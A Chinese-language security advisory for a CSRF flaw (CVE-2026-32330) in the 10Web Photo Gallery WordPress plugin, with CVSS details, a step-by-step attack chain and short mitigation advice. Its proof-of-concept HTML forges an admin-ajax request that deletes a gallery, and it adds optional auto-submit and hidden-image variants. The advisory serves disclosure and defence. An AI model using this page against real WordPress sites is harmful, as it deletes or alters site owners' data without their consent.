CVE-2026-32330 | 10Web Photo Gallery 跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2026-32330

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

10Web Photo Gallery by 10Web (WordPress插件)

漏洞概述

CVE-2026-32330是WordPress插件10Web Photo Gallery中的一个跨站请求伪造（CSRF）漏洞。该插件是WordPress平台上广受欢迎的图库管理插件，用于创建和管理照片图库。漏洞存在于插件的某些敏感操作功能中，由于缺乏适当的CSRF令牌验证，攻击者可以诱骗已登录的管理员用户在不知情的情况下执行非预期的操作，如修改图库设置、删除图片或更改插件配置等。由于该漏洞需要用户交互（UI:R），攻击者通常通过社会工程学手段，如钓鱼邮件或恶意链接，诱导目标用户访问精心构造的网页。当已登录WordPress后台的管理员访问该恶意页面时，浏览器会自动向目标站点发送携带有效会话Cookie的请求，从而完成攻击。CVSS 4.3的评分表明该漏洞的机密性影响为低（L），完整性影响为低（L），可用性无影响（A:N），整体风险等级为中等。

技术细节

该CSRF漏洞源于10Web Photo Gallery插件在处理敏感操作时未实施有效的CSRF防护机制。攻击原理如下：1) WordPress管理员登录后，浏览器会存储会话Cookie；2) 攻击者构造恶意HTML页面，包含针对插件敏感功能的自动提交表单；3) 当管理员访问该页面时，浏览器自动发送POST请求到目标WordPress站点，请求中自动携带有效的认证Cookie；4) 插件端由于缺少token验证或Referer检查，直接执行请求中的操作。漏洞影响插件版本1.8.37及以下。攻击者利用此漏洞可执行的操作包括：修改图库配置、删除图片或相册、添加恶意图片等。CVSS向量显示攻击复杂度低（AC:L），无需认证（PR:N），但需要用户交互（UI:R），攻击向量为网络（AV:N）。

攻击链分析

STEP 1

步骤1: 侦察阶段

攻击者识别目标网站使用的WordPress版本和10Web Photo Gallery插件版本，确认版本号<=1.8.37以确定存在CSRF漏洞

STEP 2

步骤2: 构造恶意页面

攻击者创建包含恶意表单的HTML页面，表单指向目标站点的admin-ajax.php或插件特定处理端点，包含执行敏感操作（如删除图库、修改设置）的参数

STEP 3

步骤3: 社会工程学攻击

攻击者通过钓鱼邮件、恶意链接或其他方式诱导已登录的WordPress管理员访问恶意页面

STEP 4

步骤4: 自动请求触发

当管理员浏览器加载恶意页面时，JavaScript自动提交表单或使用图片标签触发GET请求，浏览器自动携带有效的认证Cookie

STEP 5

步骤5: 漏洞利用

目标WordPress站点接收到请求后，插件因缺少CSRF令牌验证，直接执行请求中的敏感操作（如删除图库、修改配置）

STEP 6

步骤6: 攻击完成

攻击者成功在管理员不知情的情况下执行了非授权操作，可能导致数据丢失或配置被篡改

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2026-32330 -->
<!-- Target: 10Web Photo Gallery WordPress Plugin <= 1.8.37 -->
<!-- This PoC demonstrates a CSRF attack to delete a gallery -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC - CVE-2026-32330</title>
</head>
<body>
    <h1>CSRF PoC for 10Web Photo Gallery</h1>
    <p>Click <a href="#" onclick="submitForm()">here</a> to see the content.</p>
    
    <form id="csrfForm" action="http://target-site.com/wp-admin/admin-ajax.php" method="POST">
        <!-- Action to delete a gallery (example) -->
        <input type="hidden" name="action" value="photo_gallery_delete_gallery">
        <input type="hidden" name="gallery_id" value="1">
        <input type="hidden" name="nonce" value="">
    </form>
    
    <script>
        function submitForm() {
            // Auto-submit the form without user knowledge
            document.getElementById('csrfForm').submit();
        }
        // Auto-submit on page load (for demonstration)
        // window.onload = function() { submitForm(); };
    </script>
    
    <!-- Alternative: Image-based CSRF trigger -->
    <!-- <img src="http://target-site.com/wp-admin/admin-ajax.php?action=photo_gallery_delete_gallery&gallery_id=1" style="display:none"> -->
</body>
</html>

影响范围

10Web Photo Gallery by 10Web <= 1.8.37

防御指南

临时缓解措施

作为临时缓解措施，管理员应避免点击来自不可信来源的链接，尤其是要求访问WordPress后台的链接。可以使用浏览器隐私模式访问不可信网站，或在完成管理员操作后完全退出登录状态。此外，可暂时禁用或删除10Web Photo Gallery插件，直到完成安全更新。